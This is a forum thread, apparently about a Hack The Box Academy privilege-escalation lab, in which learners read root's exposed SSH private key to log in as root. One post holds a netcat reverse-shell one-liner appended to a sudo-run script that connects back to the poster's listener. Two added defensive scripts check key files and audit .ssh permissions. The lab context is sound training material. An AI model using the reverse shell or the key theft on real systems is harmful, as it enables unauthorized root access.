Module - Getting Started - Privilege Escalation - Second question

@PoirsLJpHY
I think sometimes the Kali machine loses connection in between or something like that, because when I try to use the PWN box it works fine and I was able to clear the task easily. Or maybe there was an error on my side…

@TazWake
Since user2 had read access over root’s .ssh, I copied the id_rsa from there to a folder under user2, changed the permission too, but whenever I try to ssh to the server as root, I’m getting ‘Connection timeout’ error. Any idea on this?

user2@gettingstartedprivesc-145098-56f547cbb6-sx4r2:~$ ssh -p 31958 root@178.62.61.23 -i id_rsa
ssh: connect to host 178.62.61.23 port 31958: Connection timed out

Here’s the error, I tried all the users i.e., user1, user2, root. All giving same errors.

@SushWannaHack said:

@TazWake
Since user2 had read access over root’s .ssh, I copied the id_rsa from there to a folder under user2, changed the permission too, but whenever I try to ssh to the server as root, I’m getting ‘Connection timeout’ error. Any idea on this?

user2@gettingstartedprivesc-145098-56f547cbb6-sx4r2:~$ ssh -p 31958 root@178.62.61.23 -i id_rsa
ssh: connect to host 178.62.61.23 port 31958: Connection timed out

Here’s the error, I tried all the users i.e., user1, user2, root. All giving same errors.

It implies there isn’t a route to 178.62.61.23 - are you sure that is the correct IP address?

The error implies a networking issue. If you are confident the IP and port are correct, it would be worth troubleshooting with traceroute and maybe even nmap.

@TazWake , yes both the IP and ports are correct. I even spawned many other IPs and tried to connect to them thinking that there might be issue with this particular IP. But no luck, same issue with all IPs. Is there any other way to gain root access?

@SushWannaHack said:

@TazWake , yes both the IP and ports are correct. I even spawned many other IPs and tried to connect to them thinking that there might be issue with this particular IP. But no luck, same issue with all IPs. Is there any other way to gain root access?

I don’t know - I haven’t looked at this module.

What is the result of traceroute?

@TazWake , I finally resolved the issue and got the flag. I wasn’t able to escalate user2 to root even after so many attempts (timedout error), so I just copied id_rsa to the pawned machine and used it to ssh to root.

@SushWannaHack said:

@TazWake , I finally resolved the issue and got the flag. I wasn’t able to escalate user2 to root even after so many attempts (timedout error), so I just copied id_rsa to the pawned machine and used it to ssh to root.

Hey, if it works, it works.

Hey all,

So there is no .ssh folder in the root directory for me… Where would I find it?

@MoeSyzslak

The .ssh directory is typically a hidden directory.

I just wanted to note the mistakes I was making to save others an evening of coffee and head scratching…

  • At first I copied and pasted the ‘id_rsa’ file into Pluma (a notepad app). As a result the file type became ‘ASCII text’ rather than ‘OpenSSH private key’. (It all needs to be done in the shell.)
  • Secondly, once I had that correct, I was trying to log on as user@host_machine - that will just trigger a password request. You need to log on as root@host_machine.
  • (And I also spent hours getting my head around the VIM registries - namely how to copy - sorry, YANK - to clipboard… but that’s another story.)

Probably obvious to most, but I’m new to Linux. I hope that saves a few people some hours!

1 Like

When you get the error “connection refused” when connecting from the target host's bash, try the next command:
ssh root@127.0.0.1 -p 80 -i <path_to_root_rsa>
I discovered that port 80 is assigned in /etc/ssh/sshd_config.
But I don’t understand why connecting from the attack PC on port 32516 works the first time, but then not. Somewhere a route table should exist…
I think that the first address which the site gives us is like an entry point, then we are redirected to the target PC and communicate with it directly.

1 Like

Thank you for this, I was using nano instead of vim. Not sure if that was why it wasn’t taking the key or not but once I deleted the key and re-wrote it with vim it worked just fine. On a side note, I forgot to chmod 600 on the second try but it worked anyways!!

Thanks again!

I know this was a long time ago, but I was wondering if you remember if you resolved the issue you had. Because I have the exact same issue now

Thanks for mentioning copying and pasting the contents of the file. I have been trying to use scp to transfer the file for a couple of hours.

I wanted to add my struggles and solutions to this helpful thread.

Like @johneverist I had run the command: cat id_rsa, after which I highlighted, and copied into nano and saved locally as ‘id_rsa’.

I then continued to get the invalid format error.

I tried copy/pasting into vim nano etc and hit a wall.

I used wc id_rsa to see that my id_rsa had missing characters and words. It turns out the id_rsa key INCLUDES the -----BEGIN OPENSSH PRIVATE KEY----- and -----END OPENSSH PRIVATE KEY-----
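Added example, not part of any post in this thread: a shell function that checks a pasted key file for the problems described above (missing BEGIN/END lines, lost characters, wrong mode). It assumes `stat -c` and `sha256sum` from GNU coreutils; `check_key_file` and its optional expected-hash argument are names made up for this example.

```shell
# check_key_file FILE [EXPECTED_SHA256]
# Structural checks for a private key file transferred by copy/paste.
# Returns 0 when the file looks intact, 1 otherwise; findings go to stdout.
check_key_file() {
    kf="$1"; kf_sha="${2:-}"; kf_rc=0
    [ -r "$kf" ] || { echo "cannot read $kf"; return 1; }

    kf_first=$(head -n 1 "$kf")
    kf_last=$(awk 'NF { l = $0 } END { print l }' "$kf")   # last non-empty line
    case "$kf_first" in
        "-----BEGIN "*"PRIVATE KEY-----") ;;
        *) echo "missing BEGIN line"; kf_rc=1 ;;
    esac
    case "$kf_last" in
        "-----END "*"PRIVATE KEY-----") ;;
        *) echo "missing END line"; kf_rc=1 ;;
    esac

    # Carriage returns introduced by an editor or clipboard
    kf_cr=$(printf '\r')
    if grep -q "$kf_cr" "$kf"; then echo "CR line endings"; kf_rc=1; fi

    # Copy/paste often drops the final newline; flag it
    if [ -n "$(tail -c 1 "$kf")" ]; then echo "no trailing newline"; kf_rc=1; fi

    # The key file should be accessible to its owner only
    kf_mode=$(stat -c '%a' "$kf")
    case "$kf_mode" in
        600|400) ;;
        *) echo "mode $kf_mode, expected 600 or 400"; kf_rc=1 ;;
    esac

    # Optional: compare with the hash taken on the source copy
    if [ -n "$kf_sha" ]; then
        [ "$(sha256sum "$kf" | cut -d' ' -f1)" = "$kf_sha" ] ||
            { echo "sha256 mismatch"; kf_rc=1; }
    fi
    return "$kf_rc"
}

# Run directly as: sh check_key.sh id_rsa [expected_sha256]
if [ "$#" -gt 0 ]; then check_key_file "$@"; fi
```

Take the hash with `sha256sum` on the source copy and pass it as the second argument; unlike `wc`, it also catches a single changed character. `ssh-keygen -y -f id_rsa` then confirms that OpenSSH can actually parse the key.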

I didn’t find it fascinating, by copy pasting the key to local machine and ssh again to root using id_rsa; though also couldn’t find any other way too, to escalate priv from user2 directly.

spot on!! Kudos!!

HELLO, I need help with: Escalate privileges and submit the root.txt flag.
I have completed the following steps:
#at Nibbles
echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.255 1234 >/tmp/f' | tee -a monitor.sh
#ip my lhost is 10.10.14.255
/home/nibbler/personal/stuff$ sudo /home/nibbler/personal/stuff/monitor.sh
#and at my lhost:
nc -lpv 1234
but I don’t have a session on port 1234.
thank you

What up @the_huu_VietNam
I suggest you use “sudo -l”, just like the “Nibbles” section of the module. You use echo to create a reverse shell which will be different for the knowledge check.

EXERCISE NOTES:
Prompt 1: SSH into the server above with the provided credentials, and use the ‘-p xxxxxx’ to specify the port shown above. Once you login, try to find a way to move to ‘user2’, to get the flag in ‘/home/user2/flag.txt’.

  • ssh [given user]@[given ip] -p [given port number of target IP]
  • sudo -l
  • sudo -su user2
  • cd ~
  • ls
  • cat flag.txt

Prompt 2: Once you gain access to ‘user2’, try to find a way to escalate your privileges to root, to get the flag in ‘/root/flag.txt’.

  • whoami
  • cat /root/.ssh/id_rsa
  • copy results
  • cd ~

On a new cmd console (not within user2 of target ip but a cmd on the hackthebox user home) :

  • vim id_rsa
  • paste contents into id_rsa

Note: You can delete lines with the shift + v for visual mode (should not need to complete exercise). Source: How can I delete multiple lines in vi? - Stack Overflow

Note: You can also edit individual characters within the vim by pressing ‘i’ (should not need to complete exercise). Press esc to exit INSERT mode. Source: How To Edit A File Using Vim On A Linux System – Systran Box

Commands:

  • Compare cat of id_rsa to cat /root/.ssh/id_rsa

Note: You can also check the word-counts of both files with: wc /home/user2/id_rsa
Source: https://linuxize.com/post/linux-wc-command/

Commands:

  • chmod 600 id_rsa
  • ssh root@ -p -i id_rsa

Note: You do not need to provide a path to the file; this is most likely due to the fact the hackthebox home cmd console not having an id_rsa file

Commands:

  • ls
  • cat flag.txt

Notable commands attempted during exercise (should not need to complete the exercise):
1). You can check your current directory in linux with: pwd

2). You can also cancel a bad command with: shift + z

1 Like
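The second prompt works because user2 can read root's private key. As an added example (not from the thread or the module), here is a shell audit a defender could run to find `.ssh` directories and private key files that group or others can access. It assumes `stat -c` from GNU coreutils or BusyBox, checks mode bits only (no ACLs), and the function names are made up here.

```shell
# Print "<mode> <owner>" for a path when group or others hold any permission
# bit; return 1 when only the owner has access.
open_to_others() {
    oo_mode=$(stat -c '%a' "$1" 2>/dev/null) || return 1
    case "$oo_mode" in
        0|*00) return 1 ;;                 # e.g. 700, 600, 400
        *)     stat -c '%a %U' "$1" ;;
    esac
}

# audit_ssh_perms [ROOT]
# Walk ROOT (default /) and report:
#   DIR  <mode> <owner> <path>   .ssh directory open to group/others
#   KEY  <mode> <owner> <path>   private key file open to group/others
audit_ssh_perms() {
    find "${1:-/}" -xdev \( -type d -name .ssh -o -type f -path '*/.ssh/*' \) 2>/dev/null |
    while IFS= read -r p; do
        info=$(open_to_others "$p") || continue
        if [ -d "$p" ]; then
            printf 'DIR  %s %s\n' "$info" "$p"
        elif head -n 1 "$p" 2>/dev/null | grep -q -e '-----BEGIN .*PRIVATE KEY-----'; then
            # Only files that start with a private key header are reported;
            # authorized_keys, known_hosts and *.pub are skipped.
            printf 'KEY  %s %s\n' "$info" "$p"
        fi
    done
}

# Run directly as: sh audit_ssh.sh /root /home
for audit_arg in "$@"; do audit_ssh_perms "$audit_arg"; done
```

Any line of output is a finding: the fix is `chmod 700` on the directory and `chmod 600` on the key, followed by rotating a key that other accounts could already have read.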